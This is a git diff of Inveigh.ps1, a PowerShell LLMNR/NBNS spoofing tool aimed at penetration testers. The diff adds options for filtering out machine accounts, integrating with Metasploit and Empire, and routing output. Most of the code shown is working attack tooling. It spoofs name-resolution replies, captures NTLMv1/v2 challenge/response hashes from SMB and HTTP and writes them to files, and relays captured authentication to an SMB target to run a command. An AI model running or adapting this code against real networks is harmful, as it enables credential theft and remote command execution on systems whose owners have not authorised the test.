aboutsummaryrefslogtreecommitdiff
path: root/Inveigh.ps1
diff options
context:
space:
mode:
Diffstat (limited to 'Inveigh.ps1')
-rw-r--r--Inveigh.ps1712
1 files changed, 465 insertions, 247 deletions
diff --git a/Inveigh.ps1 b/Inveigh.ps1
index 9f05e74..d71fe4e 100644
--- a/Inveigh.ps1
+++ b/Inveigh.ps1
@@ -6,13 +6,25 @@ Inveigh is a Windows PowerShell LLMNR/NBNS spoofer with challenge/response captu
.DESCRIPTION
Inveigh is a Windows PowerShell LLMNR/NBNS spoofer designed to assist penetration testers that find themselves limited to a Windows system.
-This can commonly occur while performing phishing attacks, USB drive attacks, VLAN pivoting, or simply being restricted to a Windows system as part of client imposed restrictions.
+This can commonly occur while performing standard post exploitation, phishing attacks, USB drive attacks, VLAN pivoting, or simply being restricted to a Windows system as part of client imposed restrictions.
.PARAMETER IP
Specify a specific local IP address for listening. This IP address will also be used for LLMNR/NBNS spoofing if the 'SpoofIP' parameter is not set.
.PARAMETER SpooferIP
-Specify an IP address for LLMNR/NBNS spoofing. This parameter is only necessary when redirecting victims to another system.
+Specify an IP address for LLMNR/NBNS spoofing. This parameter is only necessary when redirecting victims to a system other than the Inveigh host.
+
+.PARAMETER LLMNR
+Default = Enabled: Enable/Disable LLMNR spoofing.
+
+.PARAMETER NBNS
+Default = Disabled: Enable/Disable NBNS spoofing.
+
+.PARAMETER NBNSTypes
+Default = 00,20: Comma separated list of NBNS types to spoof. Types include 00 = Workstation Service, 03 = Messenger Service, 20 = Server Service, 1B = Domain Name
+
+.PARAMETER Repeat
+Default = Enabled: Enable/Disable repeated LLMNR/NBNS spoofs to a victim system after one user challenge/response has been captured.
.PARAMETER HTTP
Default = Enabled: Enable/Disable HTTP challenge/response capture.
@@ -23,18 +35,16 @@ If the script does not exit gracefully, execute "netsh http delete sslcert ippor
.PARAMETER SMB
Default = Enabled: Enable/Disable SMB challenge/response capture. Warning, LLMNR/NBNS spoofing can still direct targets to the host system's SMB server.
+Block TCP ports 445/139 if you need to prevent login requests from being processed by the Inveigh host.
-.PARAMETER LLMNR
-Default = Enabled: Enable/Disable LLMNR spoofing.
+.PARAMETER Challenge
+Default = Random: Specify a 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random challenge will be generated for each request.
-.PARAMETER NBNS
-Default = Disabled: Enable/Disable NBNS spoofing.
+.PARAMETER MachineAccounts
+Default = Disabled: Enable/Disable showing NTLM challenge/response captures from machine accounts.
-.PARAMETER NBNSTypes
-Default = 20: Comma separated list of NBNS types to spoof. Types include 00 = Workstation Service, 03 = Messenger Service, 20 = Server Service, 1B = Domain Name
-
-.PARAMETER Challenge
-Default = Random: Specify a 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random challenge will be generated for each request.
+.PARAMETER ForceWPADAuth
+Default = Enabled: Matches Responder option to Enable/Disable authentication for wpad.dat GET requests. Disabling can prevent browser login prompts.
.PARAMETER SMBRelay
Default = Disabled: Enable/Disable SMB relay.
@@ -46,7 +56,7 @@ IP address of system to target for SMB relay.
Command to execute on SMB relay target.
.PARAMETER SMBRelayUsernames
-Default = All Usernames: Comma separated list of usernames to use for relay attacks. Accepts either just the username of domain\username format.
+Default = All Usernames: Comma separated list of usernames to use for relay attacks. Accepts both username and domain\username format.
.PARAMETER SMBRelayAutoDisable
Default = Enable: Automaticaly disable SMB relay after a successful command execution on target.
@@ -54,26 +64,18 @@ Default = Enable: Automaticaly disable SMB relay after a successful command exec
.PARAMETER SMBRelayNetworkTimeout
Default = No Timeout: Set the duration in seconds that Inveigh will wait for a reply from the SMB relay target after each packet is sent.
-.PARAMETER Repeat
-Default = Enabled: Enable/Disable repeated LLMNR/NBNS spoofs to a victim system after one user challenge/response has been captured.
-
-.PARAMETER ForceWPADAuth
-Default = Enabled: Matches Responder option to Enable/Disable authentication for wpad.dat GET requests. Disabling can prevent browser login prompts.
-
-.PARAMETER ConsolePrompt
-Default = Enabled: Enable/Disable the console prompt.
-
-.PARAMETER RunTime
-Set the run time duration in minutes. Note that leaving the Inveigh console open will prevent Inveigh from exiting once the set run time is reached.
-
.PARAMETER ConsoleOutput
-Default = Console Output Disabled: Enable/Disable real time console output.
+Default = Disabled: Enable/Disable real time console output. If using this option through a shell, test to ensure that it doesn't hang the shell.
.PARAMETER FileOutput
-Default = File Output Disabled: Enable/Disable real time file output.
+Default = Disabled: Enable/Disable real time file output.
.PARAMETER StatusOutput
-Default = Status Output Enabled: Enable/Disable statup and shutdown output.
+Default = Enabled: Enable/Disable statup and shutdown messages.
+
+.PARAMETER OutputStreamOnly
+Default = Disabled: Enable/Disable forcing all output to the standard output stream. This can be helpful if running Inveigh through a shell that does not return other output streams.
+Note that you will not see the various yellow warning messages if enabled.
.PARAMETER OutputDir
Default = Working Directory: Set an output directory for log and capture files.
@@ -81,6 +83,12 @@ Default = Working Directory: Set an output directory for log and capture files.
.PARAMETER ShowHelp
Default = Enabled: Enable/Disable the help messages at startup.
+.PARAMETER RunTime
+Set the run time duration in minutes.
+
+.PARAMETER Tool
+Default = 0: Enable/Disable features for better operation through external tools such as Metasploit's Interactive Powershell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire
+
.EXAMPLE
Import-Module;Invoke-Inveigh
Import module and execute with all default settings.
@@ -144,7 +152,7 @@ param
[parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$SMB="Y",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$LLMNR="Y",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$NBNS="N",
- [parameter(Mandatory=$false)][ValidateSet("00","03","20","1B","1C","1D","1E")][array]$NBNSTypes="20",
+ [parameter(Mandatory=$false)][ValidateSet("00","03","20","1B","1C","1D","1E")][array]$NBNSTypes=@("00","20"),
[parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][string]$Challenge="",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$SMBRelay="N",
[parameter(Mandatory=$false)][ValidateScript({$_ -match [IPAddress]$_ })][string]$SMBRelayTarget ="",
@@ -157,8 +165,11 @@ param
[parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$ConsoleOutput="N",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$FileOutput="N",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$StatusOutput="Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$OutputStreamOnly="N",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$MachineAccounts="N",
[parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][string]$OutputDir="",
[parameter(Mandatory=$false)][int]$RunTime="",
+ [parameter(Mandatory=$false)][ValidateSet("0","1","2")][string]$Tool="0",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$ShowHelp="Y",
[parameter(ValueFromRemainingArguments=$true)] $invalid_parameter
)
@@ -203,7 +214,6 @@ else
if(!$inveigh)
{
$global:inveigh = [hashtable]::Synchronized(@{})
- $inveigh.console_queue = New-Object System.Collections.ArrayList
$inveigh.log = New-Object System.Collections.ArrayList
$inveigh.NTLMv1_list = New-Object System.Collections.ArrayList
$inveigh.NTLMv2_list = New-Object System.Collections.ArrayList
@@ -220,6 +230,8 @@ if($inveigh.HTTP_listener.IsListening)
$inveigh.HTTP_listener.Close()
}
+$inveigh.console_queue = New-Object System.Collections.ArrayList
+$inveigh.status_queue = New-Object System.Collections.ArrayList
$inveigh.log_file_queue = New-Object System.Collections.ArrayList
$inveigh.NTLMv1_file_queue = New-Object System.Collections.ArrayList
$inveigh.NTLMv2_file_queue = New-Object System.Collections.ArrayList
@@ -228,6 +240,7 @@ $inveigh.host = $host
$inveigh.HTTP_challenge_queue = New-Object System.Collections.ArrayList
$inveigh.SMB_relay_active_step = 0
$inveigh.console_output = $false
+$inveigh.console_input = $true
$inveigh.file_output = $false
$inveigh.log_out_file = $output_directory + "\Inveigh-Log.txt"
$inveigh.NTLMv1_out_file = $output_directory + "\Inveigh-NTLMv1.txt"
@@ -243,28 +256,59 @@ else
$inveigh.status_output = $false
}
+if($OutputStreamOnly -eq 'y')
+{
+ $inveigh.output_stream_only = $true
+}
+else
+{
+ $inveigh.output_stream_only = $false
+}
+
+if($Tool -eq 1) # Metasploit Interactive Powershell
+{
+ $inveigh.tool = 1
+ $inveigh.output_stream_only = $true
+ $inveigh.newline = ""
+ $ConsoleOutput = "N"
+}
+elseif($Tool -eq 2) # PowerShell Empire
+{
+ $inveigh.tool = 2
+ $inveigh.output_stream_only = $true
+ $inveigh.console_input = $false
+ $inveigh.newline = "`n"
+ $ConsoleOutput = "Y"
+ $ShowHelp = "N"
+}
+else
+{
+ $inveigh.tool = 0
+ $inveigh.newline = ""
+}
+
# Write startup messages
if($inveigh.status_output)
{
- Write-Output "Inveigh started at $(Get-Date -format 's')"
- $inveigh.log.add("$(Get-Date -format 's') - Inveigh started") |out-null
+ $inveigh.status_queue.add("Inveigh started at $(Get-Date -format 's')")|Out-Null
+ $inveigh.log.add("$(Get-Date -format 's') - Inveigh started") |Out-Null
if($FileOutput -eq 'y')
{
"$(Get-Date -format 's') - Inveigh started" |Out-File $Inveigh.log_out_file -Append
}
- Write-Output "Listening IP Address = $IP"
- Write-Output "LLMNR/NBNS Spoofer IP Address = $SpooferIP"
+ $inveigh.status_queue.add("Listening IP Address = $IP") |Out-Null
+ $inveigh.status_queue.add("LLMNR/NBNS Spoofer IP Address = $SpooferIP")|Out-Null
if($LLMNR -eq 'y')
{
- Write-Output 'LLMNR Spoofing Enabled'
+ $inveigh.status_queue.add("LLMNR Spoofing Enabled")|Out-Null
$LLMNR_response_message = "- spoofed response has been sent"
}
else
{
- Write-Output 'LLMNR Spoofing Disabled'
+ $inveigh.status_queue.add("LLMNR Spoofing Disabled")|Out-Null
$LLMNR_response_message = "- LLMNR spoofing is disabled"
}
@@ -274,36 +318,35 @@ if($inveigh.status_output)
if($NBNSTypes.Count -eq 1)
{
- Write-Output "NBNS Spoofing Of Type $NBNSTypes_output Enabled"
+ $inveigh.status_queue.add("NBNS Spoofing Of Type $NBNSTypes_output Enabled")|Out-Null
}
else
{
- Write-Output "NBNS Spoofing Of Types $NBNSTypes_output Enabled"
+ $inveigh.status_queue.add("NBNS Spoofing Of Types $NBNSTypes_output Enabled")|Out-Null
}
$NBNS_response_message = "- spoofed response has been sent"
}
else
{
- Write-Output 'NBNS Spoofing Disabled'
+ $inveigh.status_queue.add("NBNS Spoofing Disabled")|Out-Null
$NBNS_response_message = "- NBNS spoofing is disabled"
}
- if($Challenge)
+ if($Repeat -eq 'n')
{
- Write-Output "NTLM Challenge = $Challenge"
+ $inveigh.status_queue.add("Spoof Repeating Disabled")|Out-Null
}
-
if($HTTP -eq 'y')
{
$inveigh.HTTP = $true
- Write-Output 'HTTP Capture Enabled'
+ $inveigh.status_queue.add("HTTP Capture Enabled")|Out-Null
}
else
{
$inveigh.HTTP = $false
- Write-Output 'HTTP Capture Disabled'
+ $inveigh.status_queue.add("HTTP Capture Disabled")|Out-Null
}
if($HTTPS -eq 'y')
@@ -318,34 +361,53 @@ if($inveigh.status_output)
$certificate_store.Add($certificate)
$certificate_store.Close()
Invoke-Expression -command ("netsh http add sslcert ipport=0.0.0.0:443 certhash=" + $inveigh.certificate_thumbprint + " appid='{00112233-4455-6677-8899-AABBCCDDEEFF}'") > $null
- Write-Output 'HTTPS Capture Enabled'
+ $inveigh.status_queue.add("HTTPS Capture Enabled")|Out-Null
}
catch
{
$certificate_store.Close()
$HTTPS="N"
$inveigh.HTTPS = $false
- Write-Output 'HTTPS Capture Disabled Due To Certificate Install Error'
+ $inveigh.status_queue.add("HTTPS Capture Disabled Due To Certificate Install Error")|Out-Null
}
}
else
{
- Write-Output 'HTTPS Capture Disabled'
+ $inveigh.status_queue.add("HTTPS Capture Disabled")|Out-Null
+ }
+
+ if($Challenge)
+ {
+ $inveigh.status_queue.add("NTLM Challenge = $Challenge")|Out-Null
}
if($SMB -eq 'y')
{
- Write-Output 'SMB Capture Enabled'
+ $inveigh.status_queue.add("SMB Capture Enabled")|Out-Null
+ }
+ else
+ {
+ $inveigh.status_queue.add("SMB Capture Disabled")|Out-Null
+ }
+
+ if($MachineAccounts -eq 'n')
+ {
+ $inveigh.status_queue.add("Ignoring Machine Accounts")|Out-Null
+ }
+
+ if($ForceWPADAuth -eq 'y')
+ {
+ $inveigh.status_queue.add("Force WPAD Authentication Enabled")|Out-Null
}
else
{
- Write-Output 'SMB Capture Disabled'
+ $inveigh.status_queue.add("Force WPAD Authentication Disabled")|Out-Null
}
if($SMBRelay -eq 'y')
{
- Write-Output 'SMB Relay Enabled'
- Write-Output "SMB Relay Target = $SMBRelayTarget"
+ $inveigh.status_queue.add("SMB Relay Enabled") |Out-Null
+ $inveigh.status_queue.add("SMB Relay Target = $SMBRelayTarget")|Out-Null
if($SMBRelayUsernames.Count -gt 0)
{
@@ -353,88 +415,107 @@ if($inveigh.status_output)
if($SMBRelayUsernames.Count -eq 1)
{
- Write-Output "SMB Relay Username = $SMBRelayUsernames_output"
+ $inveigh.status_queue.add("SMB Relay Username = $SMBRelayUsernames_output")|Out-Null
}
else
{
- Write-Output "SMB Relay Usernames = $SMBRelayUsernames_output"
+ $inveigh.status_queue.add("SMB Relay Usernames = $SMBRelayUsernames_output")|Out-Null
}
}
+
+ if($SMBRelayAutodisable -eq 'y')
+ {
+ $inveigh.status_queue.add("SMB Relay Auto Disable Enabled")|Out-Null
+ }
+ else
+ {
+ $inveigh.status_queue.add("SMB Relay Auto Disable Disabled")|Out-Null
+ }
+
+ if($SMBRelayNetworkTimeout)
+ {
+ $inveigh.status_queue.add("SMB Relay Network Timeout = $SMBRelayNetworkTimeout Seconds")|Out-Null
+ }
$inveigh.SMB_relay = $true
}
else
{
- Write-Output 'SMB Relay Disabled'
+ $inveigh.status_queue.add("SMB Relay Disabled")|Out-Null
$inveigh.SMB_relay = $false
}
- if($SMBRelayAutodisable -eq 'y')
- {
- Write-Output 'SMB Relay Auto Disable Enabled'
- }
- else
- {
- Write-Output 'SMB Relay Auto Disable Disabled'
- }
-
- if($SMBRelayNetworkTimeout)
- {
- Write-Output "SMB Relay Network Timeout = $SMBRelayNetworkTimeout Seconds"
- }
-
- if($Repeat -eq 'y')
+ if($ConsoleOutput -eq 'y')
{
- Write-Output 'Spoof Repeating Enabled'
+ $inveigh.status_queue.add("Real Time Console Output Enabled")|Out-Null
+ $inveigh.console_output = $true
}
else
{
- Write-Output 'Spoof Repeating Disabled'
+ if($inveigh.tool -eq 1)
+ {
+ $inveigh.status_queue.add("Real Time Console Output Disabled Due To External Tool Selection")|Out-Null
+ }
+ else
+ {
+ $inveigh.status_queue.add("Real Time Console Output Disabled")|Out-Null
+ }
}
- if($ForceWPADAuth -eq 'y')
+ if($FileOutput -eq 'y')
{
- Write-Output 'Force WPAD Authentication Enabled'
+ $inveigh.status_queue.add("Real Time File Output Enabled")|Out-Null
+ $inveigh.status_queue.add("Output Directory = $output_directory")|Out-Null
+ $inveigh.file_output = $true
}
else
{
- Write-Output 'Force WPAD Authentication Disabled'
+ $inveigh.status_queue.add("Real Time File Output Disabled")|Out-Null
}
if($RunTime -eq 1)
{
- Write-Output "Run Time = $RunTime Minute"
+ $inveigh.status_queue.add("Run Time = $RunTime Minute")|Out-Null
}
elseif($RunTime -gt 1)
{
- Write-Output "Run Time = $RunTime Minutes"
- }
-
- if($ConsoleOutput -eq 'y')
- {
- Write-Output 'Console Output Enabled'
- $inveigh.console_output = $true
- }
- else
- {
- Write-Output 'Console Output Disabled'
+ $inveigh.status_queue.add("Run Time = $RunTime Minutes")|Out-Null
}
- if($FileOutput -eq 'y')
- {
- Write-Output 'File Output Enabled'
- Write-Output "Output Directory = $output_directory"
- $inveigh.file_output = $true
- }
- else
+ if($ShowHelp -eq 'y')
{
- Write-Output 'File Output Disabled'
+ $inveigh.status_queue.add("Run Get-InveighHelp to show available cmdlets")|Out-Null
+ $inveigh.status_queue.add("Run Stop-Inveigh to stop Inveigh")|Out-Null
+
+ if($inveigh.console_output)
+ {
+ $inveigh.status_queue.add("Press any key to stop real time console output")|Out-Null
+ }
}
- if($ShowHelp -eq 'y')
+ while($inveigh.status_queue.Count -gt 0)
{
- Write-Output 'Run Get-InveighHelp to show available cmdlets'
- Write-Warning 'Run Stop-Inveigh to stop Inveigh'
+ if($inveigh.output_stream_only)
+ {
+ write-output($inveigh.status_queue[0] + $inveigh.newline)
+ $inveigh.status_queue.RemoveRange(0,1)
+ }
+ else
+ {
+ switch ($inveigh.status_queue[0])
+ {
+ "Run Stop-Inveigh to stop Inveigh"
+ {
+ write-warning($inveigh.status_queue[0])
+ $inveigh.status_queue.RemoveRange(0,1)
+ }
+ default
+ {
+ write-output($inveigh.status_queue[0])
+ $inveigh.status_queue.RemoveRange(0,1)
+ }
+ }
+ }
}
}
@@ -448,16 +529,16 @@ $process_ID = $process_ID -replace "-00-00",""
# Shared Basic Functions ScriptBlock
$shared_basic_functions_scriptblock =
{
- Function DataToUInt16( $field )
+ Function DataToUInt16($field)
{
- [Array]::Reverse( $field )
- return [BitConverter]::ToUInt16( $field, 0 )
+ [Array]::Reverse($field)
+ return [BitConverter]::ToUInt16($field,0)
}
- Function DataToUInt32( $field )
+ Function DataToUInt32($field)
{
- [Array]::Reverse( $field )
- return [BitConverter]::ToUInt32( $field, 0 )
+ [Array]::Reverse($field)
+ return [BitConverter]::ToUInt32($field,0)
}
Function DataLength
@@ -534,7 +615,7 @@ $SMB_NTLM_functions_scriptblock =
$NTLMv2_response = $NTLMv2_response.Insert(32,':')
$NTLMv2_hash = $NTLM_user_string + "::" + $NTLM_domain_string + ":" + $NTLM_challenge + ":" + $NTLMv2_response
- if($source_IP -ne $IP)
+ if(($source_IP -ne $IP) -and (($MachineAccounts -eq 'y') -or (($MachineAccounts -eq 'n') -and (-not $NTLM_user_string.EndsWith('$')))))
{
$inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - SMB NTLMv2 challenge/response for $NTLM_domain_string\$NTLM_user_string captured from $source_IP($NTLM_host_string)")])
$inveigh.NTLMv2_file_queue.add($NTLMv2_hash)
@@ -545,7 +626,6 @@ $SMB_NTLM_functions_scriptblock =
{
$inveigh.console_queue.add("SMB NTLMv2 challenge/response written to " + $inveigh.NTLMv2_out_file)
}
-
}
}
else
@@ -554,7 +634,7 @@ $SMB_NTLM_functions_scriptblock =
$NTLMv1_response = $NTLMv1_response.Insert(48,':')
$NTLMv1_hash = $NTLM_user_string + "::" + $NTLM_domain_string + ":" + $NTLMv1_response + ":" + $NTLM_challenge
- if($source_IP -ne $IP)
+ if(($source_IP -ne $IP) -and (($MachineAccounts -eq 'y') -or (($MachineAccounts -eq 'n') -and (-not $NTLM_user_string.EndsWith('$')))))
{
$inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - SMB NTLMv1 challenge/response for $NTLM_domain_string\$NTLM_user_string captured from $source_IP($NTLM_host_string)")])
$inveigh.NTLMv1_file_queue.add($NTLMv1_hash)
@@ -679,6 +759,7 @@ $SMB_relay_response_scriptblock =
param ($SMB_relay_socket,$HTTP_request_bytes,$SMB_user_ID)
$SMB_relay_response_bytes = New-Object System.Byte[] 1024
+
if ($SMB_relay_socket)
{
$SMB_relay_response_stream = $SMB_relay_socket.GetStream()
@@ -1066,9 +1147,8 @@ $SMB_relay_execute_scriptblock =
# HTTP/HTTPS Server ScriptBlock - HTTP/HTTPS listener
$HTTP_scriptblock =
-{
-
- param ($Challenge,$SMBRelay,$SMBRelayTarget,$SMBRelayCommand,$SMBRelayUsernames,$SMBRelayAutoDisable,$SMBRelayNetworkTimeout,$Repeat,$ForceWPADAuth)
+{
+ param ($Challenge,$SMBRelay,$SMBRelayTarget,$SMBRelayCommand,$SMBRelayUsernames,$SMBRelayAutoDisable,$SMBRelayNetworkTimeout,$Repeat,$MachineAccounts,$ForceWPADAuth)
Function NTLMChallengeBase64
{
@@ -1241,9 +1321,8 @@ $HTTP_scriptblock =
$NTLM_response = $NTLM_response.Insert(48,':')
$inveigh.HTTP_NTLM_hash = $HTTP_NTLM_user_string + "::" + $HTTP_NTLM_domain_string + ":" + $NTLM_response + ":" + $NTLM_challenge
- if(($NTLM_challenge -ne '') -and ($NTLM_response -ne ''))
+ if((($NTLM_challenge -ne '') -and ($NTLM_response -ne '')) -and (($MachineAccounts -eq 'y') -or (($MachineAccounts -eq 'n') -and (-not $HTTP_NTLM_user_string.EndsWith('$')))))
{
-
$inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - $HTTP_type NTLMv1 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from " + $inveigh.request.RemoteEndpoint.Address + "(" + $HTTP_NTLM_host_string + ")")])
$inveigh.NTLMv1_file_queue.add($inveigh.HTTP_NTLM_hash)
$inveigh.NTLMv1_list.add($inveigh.HTTP_NTLM_hash)
@@ -1253,7 +1332,6 @@ $HTTP_scriptblock =
{
$inveigh.console_queue.add("$HTTP_type NTLMv1 challenge/response written to " + $inveigh.NTLMv1_out_file)
}
-
}
if (($inveigh.IP_capture_list -notcontains $inveigh.request.RemoteEndpoint.Address) -and (-not $HTTP_NTLM_user_string.EndsWith('$')) -and ($Repeat -eq 'n'))
@@ -1268,7 +1346,7 @@ $HTTP_scriptblock =
$NTLM_response = $NTLM_response.Insert(32,':')
$inveigh.HTTP_NTLM_hash = $HTTP_NTLM_user_string + "::" + $HTTP_NTLM_domain_string + ":" + $NTLM_challenge + ":" + $NTLM_response
- if(($NTLM_challenge -ne '') -and ($NTLM_response -ne ''))
+ if((($NTLM_challenge -ne '') -and ($NTLM_response -ne '')) -and (($MachineAccounts -eq 'y') -or (($MachineAccounts -eq 'n') -and (-not $HTTP_NTLM_user_string.EndsWith('$')))))
{
$inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from " + $inveigh.request.RemoteEndpoint.address + "(" + $HTTP_NTLM_host_string + ")")])
$inveigh.NTLMv2_file_queue.add($inveigh.HTTP_NTLM_hash)
@@ -1295,43 +1373,53 @@ $HTTP_scriptblock =
{
if((!$SMBRelayUsernames) -or ($SMBRelayUsernames -contains $HTTP_NTLM_user_string) -or ($SMBRelayUsernames -contains "$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))
{
- if($inveigh.SMBRelay_failed_list -notcontains "$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string $SMBRelayTarget")
+ if(($MachineAccounts -eq 'y') -or (($MachineAccounts -eq 'n') -and (-not $HTTP_NTLM_user_string.EndsWith('$'))))
{
- if($NTLM_type -eq 'NTLMv2')
+ if($inveigh.SMBRelay_failed_list -notcontains "$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string $SMBRelayTarget")
{
- $inveigh.console_queue.add("Sending $NTLM_type response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string for relay to $SMBRelaytarget")
- $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - Sending $NTLM_type response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string for relay to $SMBRelaytarget")])
- $SMB_relay_response_return_bytes = SMBRelayResponse $SMB_relay_socket $HTTP_request_bytes $SMB_user_ID
- $SMB_relay_response_return_bytes = $SMB_relay_response_return_bytes[1..$SMB_relay_response_return_bytes.length]
-
- if((!$SMB_relay_failed) -and ([System.BitConverter]::ToString($SMB_relay_response_return_bytes[9..12]) -eq ('00-00-00-00')))
+ if($NTLM_type -eq 'NTLMv2')
{
- $inveigh.console_queue.add("$HTTP_type to SMB relay authentication successful for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string on $SMBRelayTarget")
- $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - $HTTP_type to SMB relay authentication successful for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string on $SMBRelayTarget")])
- $inveigh.SMB_relay_active_step = 4
- SMBRelayExecute $SMB_relay_socket $SMB_user_ID
+ $inveigh.console_queue.add("Sending $NTLM_type response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string for relay to $SMBRelaytarget")
+ $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - Sending $NTLM_type response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string for relay to $SMBRelaytarget")])
+ $SMB_relay_response_return_bytes = SMBRelayResponse $SMB_relay_socket $HTTP_request_bytes $SMB_user_ID
+ $SMB_relay_response_return_bytes = $SMB_relay_response_return_bytes[1..$SMB_relay_response_return_bytes.length]
+
+ if((!$SMB_relay_failed) -and ([System.BitConverter]::ToString($SMB_relay_response_return_bytes[9..12]) -eq ('00-00-00-00')))
+ {
+ $inveigh.console_queue.add("$HTTP_type to SMB relay authentication successful for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string on $SMBRelayTarget")
+ $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - $HTTP_type to SMB relay authentication successful for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string on $SMBRelayTarget")])
+ $inveigh.SMB_relay_active_step = 4
+ SMBRelayExecute $SMB_relay_socket $SMB_user_ID
+ }
+ else
+ {
+ $inveigh.console_queue.add("$HTTP_type to SMB relay authentication failed for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string on $SMBRelayTarget")
+ $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - $HTTP_type to SMB relay authentication failed for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string on $SMBRelayTarget")])
+ $inveigh.SMBRelay_failed_list += "$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string $SMBRelayTarget"
+ $inveigh.SMB_relay_active_step = 0
+ $SMB_relay_socket.Close()
+ }
}
else
{
- $inveigh.console_queue.add("$HTTP_type to SMB relay authentication failed for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string on $SMBRelayTarget")
- $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - $HTTP_type to SMB relay authentication failed for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string on $SMBRelayTarget")])
- $inveigh.SMBRelay_failed_list += "$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string $SMBRelayTarget"
+ $inveigh.console_queue.add("NTLMv1 relay not yet supported")
+ $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - NTLMv1 relay not yet supported")])
$inveigh.SMB_relay_active_step = 0
$SMB_relay_socket.Close()
}
}
else
{
- $inveigh.console_queue.add("NTLMv1 relay not yet supported")
- $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - NTLMv1 relay not yet supported")])
+ $inveigh.console_queue.add("Aborting relay since $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string has already been tried on $SMBRelayTarget")
+ $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - Aborting relay since $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string has already been tried on $SMBRelayTarget")])
$inveigh.SMB_relay_active_step = 0
$SMB_relay_socket.Close()
}
}
else
{
- $inveigh.console_queue.add("Aborting relay since $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string has already been tried on $SMBRelayTarget")
- $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - Aborting relay since $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string has already been tried on $SMBRelayTarget")])
+ $inveigh.console_queue.add("Aborting relay since $HTTP_NTLM_user_string appears to be a machine account")
+ $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - Aborting relay since $HTTP_NTLM_user_string appears to be a machine account")])
$inveigh.SMB_relay_active_step = 0
$SMB_relay_socket.Close()
}
@@ -1366,8 +1454,7 @@ $HTTP_scriptblock =
# Sniffer/Spoofer ScriptBlock - LLMNR/NBNS Spoofer and SMB sniffer
$sniffer_scriptblock =
{
-
- param ($LLMNR_response_message,$NBNS_response_message,$IP,$SpooferIP,$SMB,$LLMNR,$NBNS,$NBNSTypes,$Repeat,$ForceWPADAuth,$RunTime)
+ param ($LLMNR_response_message,$NBNS_response_message,$IP,$SpooferIP,$SMB,$LLMNR,$NBNS,$NBNSTypes,$Repeat,$MachineAccounts,$ForceWPADAuth,$RunTime)
$byte_in = New-Object Byte[] 4
$byte_out = New-Object Byte[] 4
@@ -1385,8 +1472,8 @@ $sniffer_scriptblock =
if($RunTime)
{
- $main_timeout = new-timespan -Minutes $RunTime
- $main_stopwatch = [diagnostics.stopwatch]::StartNew()
+ $sniffer_timeout = new-timespan -Minutes $RunTime
+ $sniffer_stopwatch = [diagnostics.stopwatch]::StartNew()
}
while($inveigh.running)
@@ -1628,22 +1715,16 @@ $sniffer_scriptblock =
if($RunTime)
{
- if($main_stopwatch.elapsed -ge $main_timeout)
+ if($sniffer_stopwatch.elapsed -ge $sniffer_timeout)
{
- $inveigh.running = $false
-
if($inveigh.HTTP_listener.IsListening)
{
$inveigh.HTTP_listener.Stop()
$inveigh.HTTP_listener.Close()
}
- if($inveigh.status_output)
- {
- $inveigh.host.ui.WriteWarningLine("Inveigh auto-exited at $(Get-Date -format 's')")
- }
-
+ $inveigh.console_queue.add("Inveigh auto-exited at $(Get-Date -format 's')")
